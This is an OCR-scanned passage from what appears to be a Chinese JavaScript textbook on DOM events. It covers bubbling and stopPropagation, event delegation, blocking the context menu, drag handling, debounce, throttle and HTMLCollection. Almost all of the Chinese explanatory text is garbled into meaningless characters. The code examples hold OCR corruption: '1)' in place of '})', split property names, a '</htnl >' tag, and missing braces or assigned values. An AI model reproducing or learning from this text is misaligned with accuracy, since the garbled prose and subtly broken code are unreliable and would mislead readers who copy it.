console. log(keyCode, "4 &L mi i ')
//*4 keyCode Ay 13 BffCF @i ili T Enter 4
if(keyCode == 13){
/ /38 33 2% 2 4 0K B L 2 1 PRUAT
/ /A5 AU A UK 2 i T B o = 4
btn. click()
}
1)
/1 SRR 48 Bt A
btn. addEventListener( 'click', function() {
console. log( "& % ")
1)

</script >

</body >
</html >

6) EFEMBTEH

(1) onchange.: 1 f) N A,

(2) onselect: XABIEH

Ve AN AL F AR Bl SR AR AT

<!-- %B 3% 3.2.2 NRBEAHNHEG ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">



< title> Document </title>
</head >
< body >
T IEPEAE Y, :< select name ="" id="s" >
< option value = "1">—4E % </option >
< option value = "2">"4E % </option >
< option value = "3">=4FEZ</option >
</select >

<br>
=

< input id = "ipt" type = "text" value = "iX H = —

< script >

/7B FRAE R e I A Az AR A % Y change 3

s. addEventListener( 'change', function(event) {

//3RBEH Y option Y {E

var v = event. target. value

console. log(v)
3]

ipt. addEventListener( 'select', function(e) {

/3R Bk 3T
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SCE">

/7B e — ARG i 1, 2 ARG Y 2, 2 e = ARG i 3

console. log(window. getSelection( ). toString())

)

</script >

</body >
</html >

7 REEH
(1) onsubmit: #IAIE B AT,
(2) onreset: H EFHABH L,

3.2.3 Rl E R

NI T A B S0 58 LR S TS 3 T R TR A3 A A 2 AT i 48 5 ) HTML
JLE B, WHTIA , JavaScript ] LLi# i onXYZ J& 1 & addEventlistener O B9 77 28 DOM
TGP E T A & B =R 9T BASTR] B T R AT RAGR S AN [ A S B S R BOR: A LR
B4 IS 300 W s 1) = R 4 S LR AT DAl 4, &l 3-8 Fi .

Fie BRI 3-8 Bk, HE R W] B 0 S I T 2 19 JC R L 78 W Y A Y B AT BE AR AE —
ENFAWITE . SR RE SR SO B N YOS HL T R B ek %, T LA B S

X RS LT PN 0T 2 0 R IS R Rl ke
B W W 3 A 0 28 8L T ok =R A W B AR K
=WAFAE 1000 A4 5B T, Mgk = TR UE A A
BT SE T A T AR J5 BT BE, HE iR 1000
AT W B T35 B 1000 A4S 51T, W % 58 e
BIEEFK = ZR TARTI, #&EXMg R
SIS W T 2 E T B 24 P B O B R AR ORI

btn 1t it ifi 1

button(id=btn1) P

Kl 3-8 HIFGEEHLE
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SEBR b0 8% T B S DT N TR A A LA B A S R Y T A L A
ACER T D0 Y gt B 10 SR AL T A B g A S A 1 R AR A L SR Y M
e BT NROT R L i TR A S E R F A A G R A 3-9 R

<|DOCTYPE html=
<html lang="en">
<head>
</head>
<body>
<div>
<button id="btn1">$&#1</button>
</div>
<div>
<button id="btn2">#H2</button>
</div>
</body>
</html>

5 | html
0]
‘ 4 ~ L:_,__,_ div
S \ [
button
l ptl2 ‘
S
CET 278311 LD !
BT £ X e 24
T Shtml -
body - divl) J
buttonflifi17
& 3-9  F AR R

B 3-9 il 17 D0 A AR D) Y gk P S ol SRR B 0 B AR 2 D e
IR AR 0 B 25 22 AR o AR BRIy AR T B AR PR G MR T RO A 52 CRUPR A B
TR A AN R . BN SE S RG24 IR T 2 A0 8 50 28 AR 21 P 478 1A
SETCE , HL BB RS T Y i N2 TR IR e AT I OT R L85 i R X A ad R R
HAOF AR L AT F O AR N P 20 B A8 O B T0 R B A — A Bl ) R MR O AR
G S AE AT ORIt i 2 ) YT gk 1) 7 B T O

FAREN B I AR F I R G AE B AR iR Ja — D3R BAFHAW
LB TCR MR 2t A B I E B L Be 24k IR 5 H AR S i 5 1] 38— fil R
P T HAFR DOM XF G 3 A~ i A0 112 08 B i, SR B A R 8] 3-10 s .

e e Iy B
| : PITIE R
rrmbeny i
! button ! 1
i S 2 ]
] 1o )
BT | — P ——
Co | e
FE2
]
Ffr b SRR FE 2 R PR R RN AR
e S . RS B RO — A THE T R Al
RS, R

Kl 3-10 0k E i AR
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e R SR/ RGN E SR AR T T I

<t—— #§ 3% 3.2.3 R BIE W HER ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
< style>
#Db1{
border: 1px solid;
width: 300px;
height: 300px;
background — color: aqua;
1
#di{
width: 200px;
height: 200px;
background — color: darkgoldenrod;
1
# d2{
width: 100px;
height: 100px;
background — color: coral;
1
</style>
</head >
< body id= "bl1">
body
<div id="d1">
divl
<div id = "d2">
div2
< button id = "b2">¥#4H 1 </button >
</div>
</div>
< script >
bl.addEventListener( 'click', function() {
console. log('l S ZFH{4")
1)
dl.addEventListener( 'click', function() {
console. log('2 S 4")
1)
d2. addEventListener( 'click', function( ) {
console. log( '3 5 ZF4")
1)

b2. addEventListener( 'click', function( ) {
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console. log('d S-FH ")
1)
</script >
</body >
</html >

body
div1
dive &1

B 3-11 BB 4T 2 PraicR

E S Py S Ay & L O v S N AT )
SRR 4 B 1 B ) BT T B R
[F] 0 3 1Y DX, A 23 BN 3 Sk 2 55
PRAFAS R B AL & I IR 0% St T b . R s AT
B S PR R an & 3-11 FioR .

SERS R R U iR N NER L R S R LR Qi W
B AR WY P& A7 B AR, B DULE 52 bR R 7 AT
B, s B T 2 W2 2132 1 7 AT %*BEE’J
FoF R B, H S 7 il K S 1 0 3 R R AR
Bij Ik N AE 5 L

FHOFE WA R T NI TF EIRK, YT & &

Fie AR R0 g S AR B Y P R A 1 L A2 0 e T H ARk s — B i
PAT X AE I T AL I R AR, B DL S 28 FE Event X b Bt T 4 2144 B i A R K
event. stopPropagation() , iRZEH] 7T ABH 1k 35 744 8 w0 i 17 R . {5 mT DL SE B 5 o 45 4

i AT 20 B FE AU

<t—— %5 3 5% 3.2.3 SR B]E WA N
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF — 8">

M ZE P (B AR R ) ——>

< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">

< title> Document </title>
< style >
#b1{
border: 1px solid;
width: 300px;
height: 300px;
background — color: aqua;
}
#d1{
width: 200px;
height: 200px;

background — color: darkgoldenrod;

}
# d2{



width: 100px;
height: 100px;

background — color:

}
</style>
</head >
< body id = "b1">
body
<div id="d1">
divl
<div id="d2">
div2

WEE—DOM | 225

coral;

< button id = "b2">#z4H 1 </button>

</div >
</div>
< script >

bl.addEventListener( 'click', function( ) {
console. log('l S ")

})

dl.addEventListener( 'click', function() {
console. log('2 S ZFH{4")

)

d2. addEventListener( 'click', function() {
console. log( '3 S ZFH{4")

)

b2.addEventListener( 'click', function(event) {
[/ % R A, SR e 1 R S IAT IR R A
event. stopPropagation();
console. log('4 S ZFH{f")

1)
</script >
</body >
</htnl >

3.2.4 IR RRI RS R R T s

T8 3.2, 3 W] TSRS S 0F B e R A0S B IR A i R b, BN P
AT T A A9 Ak AR BR L3 A4> A5 R 0T LB A O SR B AL B L 32 R R LA canvas A7 2 45 4 A
SRASAULI Y A 27 1 38 3 7 B JavaSeript AURD R SRR S S 0 B I JRUE DA R A
B T B AU AR AR

<!-— 5§ 3% 3.2.4 i i H A JavaScript (U E R PR AR5 2 0F B RO R ——>

<!DOCTYPE html >
< html >
< head >

< meta charset = "utf —

<title></title>

8">
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< style type = "text/css">
#cf
border: 1px solid;
}
</style >
</head >
< body >
< button type = "button"> ddd </button >
< br>
<!—— WEfitrs ——>
<canvas id="c" width="400" height = "400"></canvas >
< script type = "text/javascript">
let ¢ = document. querySelector('#c')
let ctx = c.getContext('2d')
//i@ 3t dom A2 T ALY DOM T4 £ 1Y O &
let dom = [
{

name: 'html’,

width:400,
height:200,
x:0,

v:0,

background: 'lightblue’,
onclick:function(e)

console. log( 'html #F B ')
console. log(e)

name: 'body’,

width:300,
height:180,
x:0,

y:20,

background: 'pink',
onclick:function(e) {

console. log( 'body # #i i ')
console. log(e)

name: 'button’,

width:90,

height:30,

x:0,

y:100,

background: 'red’,

onclick:function(e, stop) {
console. log( 'button # HL; ")
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console. log(e)
stop()
}
}

/1% dom "1 [ N £5 4 il 7€ canvas 1

dom. forEach(item => {

)

ctx. fillStyle = item.background

ctx. fillRect(item. x, item. y, item. width, item. height)
ctx. fillStyle = '#£222'

ctx. font = '20px BE{K'

ctx. fi11Text(item. name, item. x, item. y + 20)

[/ T A A0 7 BT 2, ARADOIN B A Y 4 SR S 1 M R 4

c.onclick = function(e){

}

let x = e.offsetX
let y = e.offsetY
/775 B A AR R A 5 BRAT AH 32 19 DOM X 52 (1 A%
let callStack = []
dom. forEach(item => {
//H W B R 5 e R & AR AE
if(
(item.x < = x&&item. x + item. width > = x)
&&
(item.y< = y&&item. y + item. height > = y)
)
if(item. onclick) {
callStack. push(item. onclick)
}
}
1)
/A AR AR 1 KA
console. log(callStack)
/ /AR AR 2 A AR AR T B FZH G, 38— AT ZE 1 R A
for(let i = callStack.length—1;i>=0;1i-—){
/7B R B AL R B v AR
let stopFlag = false
/ /BB 1k 2 1 B I Y PR AL
function stop( ) {
stopFlag = true
}

/RAT 2 A AR A PP A IO A 207 BRI 3, IR BEL AL = 7 1B 9 B0 o AR A

callStack[i](e, stop)

/1% BRENAT 56 52 B stopFlag 284 true, A 4k 22 H0 47 HE Al AH OG5 44

if(stopFlag) {
break
}
}
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</script >
</body >
</html >
= ZEBEAT IR A R A 3-12 iR,
t . . .
ody ddd # 4L HTML 76 2 15 1 A 119 56 L, 0 75
712 A html,body 1 button 3 > X HAE L HTML f)
BRONT FUZ R FR . 2 By A A9 AR o] DX
L fih % canvas i A 1) 5o S AF BT R SEBR b iR
o B B 1 2 RS T 3R AR BT o i A AR Y AR
A E S, 2 BUbR B B Ae AR S AE 3 M IC R
Jir 22 i B L 23 T) N I, 0 B B A ¢ BB Y R
button KIRMHIE . 2 button %5 ] X 3l 1) 4
FE I 4 1 5 B 25 R A8 3-13 Fras .
B 3-12 R LEATIR 4R 2 body MR IE X S i, 35 461 & b 0 i i
gL 3-14 FiR .
v(3) [f, f. 1M eventl.html:87
»8: f (e)
»1: f (e)
»2: f (e,stop)
> 5ir—‘rmr'_\1\,-_n‘;-iﬁ: Array(@)
buttoni i eventl.html:54
» PointerEvent {isTrusted: , pointerld: 1, width: 1, height: 1, pressure: _":'-:';”'L'"""r""‘:D-:‘

€ 3-13 L i button %5 [A] DX I AR TE I 422 161 65 A o 465 28 A OR B

*(2) [f, 19 eventl.html:87
»0: f (e)
»1: f (e)

» [[Prototypel]l: Array(@)

body# S eventl.html:42
eventl.html:43

» PointerEvent {isTrusted: , pointerId: 1, width: 1, height: 1, pressure: @, .}

html &6 eventl.html:30
eventl.html:31

» PointerEvent {isTrusted: true, pointerId: 1, width: 1, height: 1, pressure: @, ..}

B 3-14 40k body HRETE BRI B £ 1 604 45 5 9 O

R R R 0 4 Hh 25 5% L T 45 A AR RS, T DL U0 S Hb 2 4R =R R AR S E T s
Pt 7

1. EHZER

HR Y A4 AR A A 2, AT DA A 0 e g0 1 R s A 5 =X BN 4. Y — Ao &
TAHEZAFILREM W — < ul >TIREZD< I >R, X P E 002 50 < 1 >R % I
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W G oo 2 0 D) AT R A< L > PR A 40 5 sy 0 L (H X R 0 5 O XA A A B

(1) X A< 1 >YE5E B2 F 4 W 2378 W AF v AR 25 B 1 22 4 ik e A ) i) f ) o 2800
2, NI IR 3% A7 it 25 [

(2) FBAT i AR P A A B A< L SHRZS , WH A HE A< 1 >HR 25 BRIAASFE7E B il S
W T TSt ol n sy AR g8

BT, FRICETT S EE LY, ST EREE DML ENRLE
B AR

<t-— S 3E 3.2.4 ~ADELFRMEFREREG >
<!DOCTYPE html >
< html >
< head >
< meta charset = "utf — 8">
<title></title>
< style type = "text/css">
# mask{
width: 100 % ;
height: 100 % ;
background — color: rgba(0,0,0,0.3);
position: fixed;
left: 0;
top: O;
[x MiZon RS T HAMITER, RS </
pointer — events: none;
}
</style >
</head >
< body >
<div id = "mask"></div >
<h2 >FH{FZEFE</h2 >
< button id = "btn">H il —4> 1i </button >
<ul id="ul">
<1i class="xx">¥ET 1 </11>
<1i class = "xx">H I 2 </11 >
<1iclass="xx">EIWi 3 </11i>
</ul >
< script type = "text/javascript">
let index = 1
[/ 2% ul 5 7 s S A
ul.onclick = (e) => {
console. log( 'ul 48 ")
console. log(e. target)
//if i e. target 3K B BR g B I OT R X R
let target = e.target
/K SR o B DT R R AR 4L
target. style. backgroundColor = 'red'
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/7% ul PERIE I —ANFT ) 14 6 R

btn.onclick = () => {
let 1i = document.createElement('11i")
1i. innerHTML = ‘#FriEINS{index++} "
1i.className = 'xx'
ul. append(1i)

}

</script >
</body >
</html >

IBATIR MG 23 R A < ul >R 28 45 8 Bl S48, BV AT 58 28 ff DR B X B A< i >R 4
RUFE ], XTI F event. target 14 2R MM AF LR, TR E<ul >FRI< L >, 7E
HH R ISR DAAE< ol SARZE, I DL T S4B i B rp il & 1 < ul >4 1y By
A, XA FHEFATE, LT event. target 5 3] T L BR fil & 4 < i >XF 4, X B AE 5L
AR E< L >t ae R AR L D aE I BAURT < ul >3 % T — P Bdi F 4, 5 F e, 7
BT CHEIN— A AL S AT A< 1> X G s A MU E N B < ul >R N ER Y BT LA
TeAATATAE B, R EE AR UE< ul >N A< L >hr & B A& s Fi

2. BHIEEIATTA

W GURIE R B Rl BV X R 5 . A — AN T4 L T B 80O & — A SOAR 4 i 2%
T H o FEX AN T 220 50N H I & A B i 3 O AN 18 57 55 52 8 T 1 23 i 3
2 ARTIRE X T T H ISR S K M B A o SR R R AR 4 T BB B .

7E R 5 BRAIA 0 bR A i S S AT WS 2 MO A i S8 1, XRE AT S g T TR
ZE LAY T K 5 HIAE S BT LA G 25 3 A48 1 BH Lk 0 G R BRIA AT A I APTL DL R A Bh T & 4 A
KB b REH A M T & TAE.

REL 1 D0 WG 25 BRIAA T R 2 00 ARG A

<t-— #B 3% 3.2.4 BHIE W S EAAT N R ——>
<! DOCTYPE html >
< html >
< head >
< meta charset = "utf — 8">
<title></title>
< style type = "text/css">
</style >
</head >
< body >
< script >
document. oncontextmenu = function(e){
/1 25 ik A i S E Y R AT B, AT D preventDefault () BH 1k BRINAT N 19 & A=
e. preventDefault()
}
</script >
</body >
</html >
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BHL LB SR INAT o 1) BRI BCA AR 22 55 L B A i S S8, o T L BHL Lk i AR 9 g AP 28
A R AE 1 8 Hh R A B A% Bl v 1 1 5 flh SR 4

3. EHMREEZH: EREH
0 VE A% I AR AR M 52 2 A4 B AEBOHROAS 930 S AR APT AP A7 7 PR B F L (H %

BRI BT R g, UL S ot R 3 B B2 Hp (AR 2 B LT LR H K mousedown,
mousemove & mouseup 3 P 1FH G W6 B FH -
SEB A S R RT3 o = A, an &l 3-15 TR .

O A ] ““} bR T f’tjfffjf?_‘” il 4 B b B

[ s % ,‘;
Gy | | Sl || Gagy

Bl 3-15 4 B R AT 23 D =853

FrAsihr B R R —E S8 3 BB
(D) HBEAREARICE L F AR, Bl Bl RAITE.,
(2) BB e F5 AT 22 B 0 TR 2R AT B2 30 L e i 0 H A5 JC K A0 AR b 44 B8 BUBR 76 24 /i AR AR S

o b A AL T A A
(3) M EUARAR AR S T2 £ T 15 HAR LR IO B ¢ R L IR A7 2 3 B 76 2

ARSI A=
e BB UL AT i 4518, 4l JavaScript JFAEF AL R T E R SR Z 6 ARSI T .

<!—— 5§ 3 % 3.2.4 4} JavaScript [F A FE M L MM RIOT KB AW EH] ——>
<!DOCTYPE html >
< html >
< head >
< meta charset = "utf — 8">
< title></title>
< style type = "text/css">

body{
margin: 0;

}

# container({
border:1px solid;
width: 400px;
height: 400px;
position: relative;

}

# box{
width: 50px;
height: 50px;
background — color: red;
position: absolute;
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}
</style>
</head >
< body >
<!-— WHiHITREWES ——>
< div id = "container">
<I-— HHRMHERTE ——>

< div id = "box">

</div>
</div>
< script >
var isDrag = false
/ /i85 box 7EHi B4R B A < AaBR Al y Ak bR
var bx
var by
/e % BbR i T BB x AR FR AT y AR B
var fx
var fy
box. onmousedown = function(e){
/8 5% RARHE T AL &
fx = e.screenX
fy = e.screenY
VATE JERTY I Jibhas R Ay
bx = Number(box.style.left.replace('px',"'")) |
px', ")) ||

[0
by = Number(box. style. top. replace( ' 0
/73 ) Hi BAR S
isDrag = true
}
container. onmousemove = function(e){
/iR B B i i) B o
var mx = e.screenX
var my = e.screenY
[/ A e A AT
if(isDrag == true)(
/¥ EL 3 0 G2 1) A s e BB 190 037 B8 32E 47 A4 (W] 09 28 4k, DR UEAR X BRUAR 12 30 3k I e 1k
VRIS
box. style. left = (bx+mx- fx) + 'px'
box. style. top = (by+ my- fy) + 'px'
}

}
box. onmouseup = function() {
/7 RAR G B 45 1 4 R Bl
isDrag = false
}
</script >
</body >
</html >
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e 15 28 AR 25 T B AR 58 4 i IR LY 3 A B B S BUAH G T g L 52 B 10 48
5B ROR — 2L

3.3 BFHEIMTR

1B BHE X T S 3 5t v e AR L BE RS 7 BN BE AR AT S OE R ST — SE
T OAACRS PR RE . 39 T BERR R throttle, 1M B #H38 % # PR K debounce, — 3 Jf
AN SR 0 BT 2 PN LR APTL TR AR T ad B v B XA [R] 37 5 B A B T 46

3.3.1 debounce 5%}

TEV YE & ) FHAE R G AFTE— RIS AT B9 FF, I sh i W < i A 08 S B
PSSl R A X — 2SS BRI R AU B IR 8] A 8 ik e 22 U, PRAT R TR
PLEE A PERE .

P BT WU AR il K F AR AR N P e B BE AT — U0 IR AE NORR P S e T
P80 2 BB 5 ek B AT I B (2 5 T — A a0 Ra N B AN el B s, HOEEAE I BR 1s P % 25 fih
KR —AF A DA e n — W2 PRI .

B Bk Y I 5 AR 22 49 0 30 68 R M 4 I R T P — R 2R Sl I P A A 3
LM GUN S, AR 2 0l 2 78 00 5T PO AR 181 TR D RE L 24 1 48 00 5T S0 A 5 BE
PO T ) A O S S A5 2 B — 1k [0 TGO P 42 B . 4 2 52 B T RE L U e 25T ) 300 B s 4R
ST S F 2 e R R Bl i AR PR AT IR AT LAAE R BT R B i A rh S ek i
W 5T IR G B . A W SO AR AT IR B L A%, DU 75 i [0l TR 4 L 5 7 W o B AT ¥R s (o %
YO o TR AR 1] T8 P 3% 1L o M T 9 Sl 3 1 O S BLR [ml OB D RE ) 2 40 AR A T

>3
P

R

<!—— 5§ 3% 3.3.1 WITIR IS S BRI T A DI Re i S ) —— >
<!DOCTYPE html >
< html >
< head >
< meta charset = "utf — 8">
<title></title>
< style type = "text/css">
# page{
margin: auto;
background — color: antiquewhite;
width: 80 % ;
padding: 15px;
}
. page — item{
padding: 10px 15px;
background — color: cadetblue;
margin — bottom: 15px;

}
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# tf
background — color: gray;
width: 50px;
height: 50px;
border — radius: 100 % ;
text —align: center;
line — height: 50px;
font — size: 20px;
font — weight: bold;
color: # fff;
position: fixed;
right: 15px;
bottom: 50px;
transition: all .3s;
}
</style >
</head >
< body >

< div id = "page">
<h2 >— AR Bl W % fil</h2 >
</div>
<div id ="t"> top </div >
< script >
for(var 1 = 0; 1< 100 ; i++){
var div = document. createElement('div')
div.className = 'page — item'
div. innerHTML = "'+ i+ T XFHNE"
page. appendChild(div)
}
//3 B body #i 4 scrollTop J@ ¥ 1) % 4

var body = document. documentElement | Idocument.body

window. onscroll = function(e){

[/ 3RBUE 1
var top = body. scrollTop
[/ T PR Bl , W) 7 Gk 0] T3 4 4, S =2 Bo i i e 1
if(top > 0){

t. style. opacity =
telse{

t. style.opacity = 0
}

I
[

}
</script >
</body >
</html >

LR MM EBIS X P ESIIEEAY 82 WeF = 1IN Y ety S N ERE R PUR I RSy &2 W 1k
FE LA ) .
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(1) V& 3h Wa T o $0A 7400 256 5 6 5 BT LAVR sl b B b onscroll 3544 T X I 114 oA 400 2% 1k
o AR M KT BRI B PN S 1 T A A S 2 e A R A AT

(2) MK S2br b FO e B R S5 1 i 0 0 — Yk B3 1 7R S 5 A% T ) e 4 £ R
EOR TV N Fu L R i =2 1) i o W 8 A

B 3 R L B BRI R AR AR R R T 25 A AR X B R s S, T DUKE 2 AR A
— P HoE BV AR 2 5 AT

<!-- %5 3 % 3.3.1 M EFA L E, AR R 2E ——>
<!DOCTYPE html >
< html >
< head >
< meta charset = "utf — 8">
<title></title>
< style type = "text/css">
# page{
margin: auto;
background — color: antiquewhite;
width: 80 % ;
padding: 15px;
}
. page — item{
padding: 10px 15px;
background — color: cadetblue;
margin — bottom: 15px;
}
# t{
background — color: gray;
width: 50px;
height: 50px;
border — radius: 100 % ;
text — align: center;
line — height: 50px;
font — size: 20px;
font — weight: bold;
color: # fff;
position: fixed;
right: 15px;
bottom: 50px;
transition: all .3s;
}
</style >
</head >
< body >

<div id = "page">
< h2 >— AR Bl W W % fil</h2 >
</div >
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<div id="t"> top </div>
< script >
for(var 1 = 0; 1< 100 ; i++){
var div = document.createElement('div')

}

div.className = 'page — item'
div. innerHTML = '"Sf'+i+ "FT L FHNE'
page. appendChild(div)

/ /3B body i A scrollTop J& Ik Y %t %

var body = document.documentElement| |document. body
VAR R

function debounce(fn, interval) {

/1€ SURE B 4% 4 5 A8

var timeout

}

return function() {

}

/ /AR B Rk 1) S BN B
var _arguments = arguments
[ MRAE IR F A fih R 1Y this X4
var this = this
/18 R b — R S B 5%, B b — R SR ACAT G 19 B A 55 R AT, AR £
/19 SEAT
clearTimeout (timeout)
/B0 BEAS Y 5 AT 65, 45 1% BRBUAE interval [8) BR B 8] B PP AT, 00 & T 45 1] 3k
/47—
timeout = setTimeout(function(){
fn.apply( this, arguments)
}, interval)

[/ e W R S T S, R TR S AR A = AT —

window. onscroll = debounce(function(e){

/ /B Event Xt 4 & 15 4 B4
console. log(e)

//ARBUE T 2 i i
var top = body. scrollTop

/4578 DR B, W) S 7 R 0] TS 4 L, Je 22 e e i 4% 4L
if(top > 0){

t. style. opacity 1

telse{

}

t. style.opacity = 0

},50)
</script >

</body >
</html >

IMABGEHZ 85 24 % L0 R 3 W 5T [ 2 SOR s 31 I A 2 wethdT R TER a5 1k
i 50ms Ji . FE SR S R BCA 2 BORAT — U IR BGE TR . A SR R AL
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AR S F A 2 R EE AT, AT LU 4 K JF 4 .

B B} R &Y A A 2 A set Timeout () & clear Timeout O P AN & AT 45 Ab PR R %, S5
AT S PAT i Fe rh, HEE LA PAT I B/ T interval 28 5 B(H . X K F A 257
R b — WA 1 AT 55, B3 3% 2 i e SR 0 1) B RE 3 interval AOE S, B £ R E b
FE S A E SCER AR SR S AT o SRR PR AP AR . BRAR BB R I A ELE Mk
SLPAT S pR BT 1B T ST E B B A AT DA S AR 2 TS B AR ATl
55 PRI IR — W PRAT — TR0l 55 ok 88, B R b s 2D 1 A4S 1 e s AT

3.3.2 throttle Yiji

R IR BT R AT AR e o 2 i A =R PR RE L (BB R RE T AL AR 2 1 55w oKL O B
P e B R R VR R ST pR BCEL B B PR P AT 58 SR I ST — B E SOl 55 pR R, X
FERY BT IC I A R AL 55 7 S = oK

JIT AR L S A 0 i e AR ERAE N RP R UPRAT — U ek B CY R 2l i JavaSeript
2 B o 1L 3% 2 Ml 2 B SR B PRAT IR AZ BRI R N AR PRAT — YO o B O 2 7 R oK KR ST T

TR B4 A R I AR 2 fih i P B SR AT AR R, T RLIRTJBR 3. 2. 4 1 Hh 4l JavaScript
J A R S B LT R AR B i S ] AR A T

<t—— £ 3 & [ 3.2. 4 §5h 4l JavaScript JEAE TR ICRBINEN ——>
<!DOCTYPE html >
< html >
< head >
< meta charset = "utf — 8">
<title></title>
< style type = "text/css">
body{
margin: 0;
}
# container({
border:1px solid;
width: 400px;
height: 400px;
position: relative;
}
# box{
width: 50px;
height: 50px;
background — color: red;
position: absolute;
}
</style >
</head >
< body >
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<\-— WHRITERNER ——>
<div id = "container">
<I-- B HEGRTE ——>

< div id = "box">

</div>
</div>
< script >
var isDrag = false

/718 5% box TE Hi BLIT4A B 1 x AL BRI y A b

var bx
var by
/iR 5 AR N B x AL BR A y Ak bR
var fx
var fy
box. onmousedown = function(e){
/ /e 5% R bR R o
fx = e.screenX

fy = e.screenY

VIAEJER 7Y O iohes R Ay
bx = Number(box.style. left. replace('px',"'"))
)|

[0
by = Number(box. style. top. replace('px',''))||0
/7T i ARES

isDrag = true

}

container. onmousemove = function(e)

VIATE 3 25N SR Y A

var mx = e.screenX

var my = e.screenY

// R e R AT R

if(isDrag == true){
/7B AR R G2 B A s e 8RR A 057 B8 2 7 A [R) A9 25 4k, PR UEAR X B 12 3 08 1 B e 1
/1R
box. style. left = (bx+ mx— fx) + 'px'
box. style. top = (by+ my- fy) + 'px'

}

}

box. onmouseup = function() {
/1 BAR AR R 52 1k B B AR
isDrag = false

}
</script >
</body >
</html >

FHEIZ S 1Y) onmousemove FEH A% AL console. log (1), 1517 45 W& %
BREAE LT BAs . 6 & Lt &%l AW 1. mE 3-16 s,
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l_'xﬂlam Consola Sou-e-» -
E O wr| @ |[fw o« | Defautioveisv | L3

K 3-16 $h4T onmousemove 4

FT T BRUbR B PR G 0 SR AT IR S B SRS 6 B (R I B SRAT A et Ml 55 O
K Gy SRV T LAAE S8 BRI 2 5 55 vt AR 2R B IRt A 2o i P i AR
i BE B e AURS A AT PERE BT LT R RO 6T 32 Sl ok 10 5T SR AT I o R i A R
il ACES N

<!—— 553 3% 3.3.2 AT R AR E L R RG] >
<!DOCTYPE html >
< html >
< head >
< meta charset = "utf — 8">
<title></title>
< style type = "text/css">
body{
margin: 0;
}
# container({
border:1px solid;
width: 400px;
height: 400px;
position: relative;
}
# box{
width: 50px;
height: 50px;
background — color: red;
position: absolute;
}
</style >
</head >
< body >
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<\-— WHRITERNER ——>
<div id = "container">
<I-- B HEGRTE ——>

< div id = "box">

</div>
</div >
< script >
var isDrag = false
/A2 55 box 7EHi B IT 4R I Y =< As bR Al y Ak A
var bx
var by
/iR 5 AR N B x AL BR A y Ak bR
var fx
var fy
box. onmousedown = function(e){
/ /e 5% R bR R o
fx = e.screenX
fy = e.screenY
/738 5% H AR X 5 0 2 i o &
bx = Number(box.style.left.replace('px',''))|]0
by = Number(box. style. top. replace('px',''))||0
[/ ) Hi B AR
isDrag = true
}
/7715 i PR AR
function throttle(fn, interval)
/ /30 S s (]
var timeout = 0
return function() {
/738 5% BR ALY 506 S8
var _arguments = arguments
/e PR ALY JR IR this X4
var _this = this
/ /3R B2 i B[]
var now = new Date().getTime()
/ /2 ST E] S timeout 2% #E KT interval
if( now — timeout > interval)({
/744 timeout F) B[] BE B Ay 24 Hif A (7]
timeout = now
[/ A R AL
fn. apply(_ this, arguments)
}
}
}
container. onmousemove = throttle(function(e){
VIATE 3 25N SR Y A
var mx = e.screenX

var my = e.screenY
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/ /%
console. log(1)
/7 R A i B A AT 5
if(isDrag == true){
/745 B BR R G 4 Al A i BB AR 1Y 052 B 14T AR (] 19 A2 4k, ORTEAR X SR 12 3l 832 JE i 1k
/RS
box. style. left = (bx+mx- fx) + 'px'
box. style. top = (by+ my- fy) + 'px'
}
},40)
box. onmouseup = function() {
/7 FRAT G 45 1k 4 L Bl 1
isDrag = false

}
</script >
</body >
</html >

B T A ZE B onmousemove FAF AL I interval B Y ] 7 I R A RE AT —
W, BRI AT Z 00 )5 43 & B . A6 PR R JER 50 1) T W FE AN B AR R 1 0 T 49 R AT D A 80 g
onmousemove {4 [ AT 2 A BEREAIR

UL BRI B A BT 5 B BRI AL AN TR B2 T U R R R A e A AT B = AT
P, SEBr B R AT %A 1k onmousemove FH A BB BATIEIB I . TEAMH T HE
1) 485 ¥ K = A5 AT 19 onmousemove S, 4% T 1 B AL IR FAZ AR A 2 SCER 14 pR 4, A
M R AR AT M 2%

3.4 HTMLCollection ¥f & 5 NodeList ¥f 5

TEHT X DOM X G4 B35 gh A7 % 2 b, & K AR R DOM % & 48 5 skl fig e
BRAIAFHEES NS  XE#HM 5 T HTMLCollection %4 5 NodeList % 4, W fl %) 4 &
SRAT Y for M3 7 H E & F s v (HH IR A B84l .

3.4.1 HTMLCollection %} %

HTMLCollection # H & /x — ML T 0 R GUREMUT A SCRY U 9T ) /938 FH 4 &
(55 arguments FL A B (array-like) X5 iR $E 46 T R M E A P EFE TR M7k
Mg . T EE(DOM 4 Z 7, LEZ#EANES HEE S HTML 5 ), %80
# Rl HTMLCollection,

HTML # DOM 1§ HTMLCollection J& B B} 55 357 B (live) o 24 H fiF 1 2 A SCRY 45 44
RAEBUER T H R, B, b AE BT @A (B, i Array. from) J5 PR AR X A4
B LI B s 5O R DOM 19 51,



242 | JavaScriptf& k= &

1. htmlCollection BB 17 %
HTMILCollection X % H 4 & UL T PEF %,
1) HTMLCollection. length

BREESPFILRENEH.
2) HTMLCollection. item()
R 25 2 RS ON 0 TR iR [ EAR Y 5. SRR S T EREL WHER B null, 5

[[] collection[i] (FE & T i # H ¥ [H if 2 3% 8] undefined) Y A J5 ¥, X 7 dF JavaScript
DOM {52 B 4E 4 A5 1

3) HTMLCollection. namedltem()

HRE 1D 3R 145 %8 5 80, A5 ASAELE  WIAR 35 7 45 £ fir %R 1Y name J8PERICHL ., AR 4
name PCRAC HREAE 4 B J5 PR, JF H AT 4 51 1) 0 R 2 HF name J& M0 A REBE VT AT .
MR ARIEIEFT A 25 F name BT S, MR A null, 1510 collection] name | (fF name A7 1F Bt
£33R [ undefined) AR 5 s, X AEAE JavaScript DOM W SEFL R AEHE H H .

2. 7£ JavaScript H{# /| HTMLCollection

HTMLCollection i i iz i 53 19 44 PR AR 51 B 4% DUB R IE XA TF . i T HTML
JLEM ID JE P B & FE ID 5 ik AT AL X R B 4SS R R Ak Ui R g k.
H il . HTMLCollection A B8 15 51 26 %0 52 59 1D, A~ X 5 B4 % X 89 05 7] A o 28 (B8R
HTMLS5 s ¥R 40807 /9 1D) .

